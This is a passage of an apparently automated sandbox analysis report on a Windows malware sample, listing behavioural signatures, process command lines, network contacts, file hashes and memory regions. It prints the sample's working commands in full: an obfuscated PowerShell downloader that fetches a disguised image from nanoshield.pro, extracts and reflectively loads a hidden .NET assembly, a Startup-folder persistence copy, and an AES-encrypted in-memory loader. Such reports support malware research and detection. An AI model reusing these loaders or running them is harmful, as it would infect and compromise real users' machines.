| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 960 wrote to memory of 4360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 960 wrote to memory of 4360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4360 wrote to memory of 1876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4360 wrote to memory of 1876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1876 wrote to memory of 3800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1876 wrote to memory of 3800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQBuDgTreGQDgTreYQBiDgTreGkDgTreZDgTreDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.40.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 30.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ewdpxzf.is3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4360-0-0x0000016898170000-0x0000016898192000-memory.dmp
memory/4360-10-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/4360-11-0x00000168967F0000-0x0000016896800000-memory.dmp
memory/4360-12-0x00000168967F0000-0x0000016896800000-memory.dmp
memory/1876-22-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/1876-24-0x0000019729180000-0x0000019729190000-memory.dmp
memory/1876-23-0x0000019729180000-0x0000019729190000-memory.dmp
memory/1876-25-0x0000019710B20000-0x0000019710B6E000-memory.dmp
memory/3800-35-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/3800-36-0x0000019D43030000-0x0000019D43040000-memory.dmp
memory/3800-43-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
memory/1876-44-0x0000019729180000-0x0000019729190000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 48874fdc03476cb442d506f5bb796f70 |
| SHA1 | 2dedcc271d935fe842f7cb4cc03873b6f688d29d |
| SHA256 | 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0 |
| SHA512 | 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 10e624ec749193e3ec4e8e73e2d74ccd |
| SHA1 | a4200f61c224af1af1e58eec4c83623b2851729c |
| SHA256 | ee3ab03ec8e520c50ab249e06c76761e988a674ddc4fa4bf58cf7e66c8a099a1 |
| SHA512 | cae9adc6aaf954d1f999f3c6540c0a3060e74b80b5644118c1e87c37dd47e5576cf315b58d76c0cdeb95dc9cdfb2511763f7fa6873662c47c3f8e76c8602c481 |
memory/1876-48-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
memory/4360-51-0x00007FFFFCFB0000-0x00007FFFFDA71000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
122s
Max time network
128s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2120-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
memory/2120-5-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp
memory/2120-7-0x0000000002460000-0x0000000002468000-memory.dmp
memory/2120-8-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp
memory/2120-6-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-9-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-10-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-11-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-12-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp
memory/2120-13-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-14-0x0000000002950000-0x00000000029D0000-memory.dmp
memory/2120-15-0x0000000002950000-0x00000000029D0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
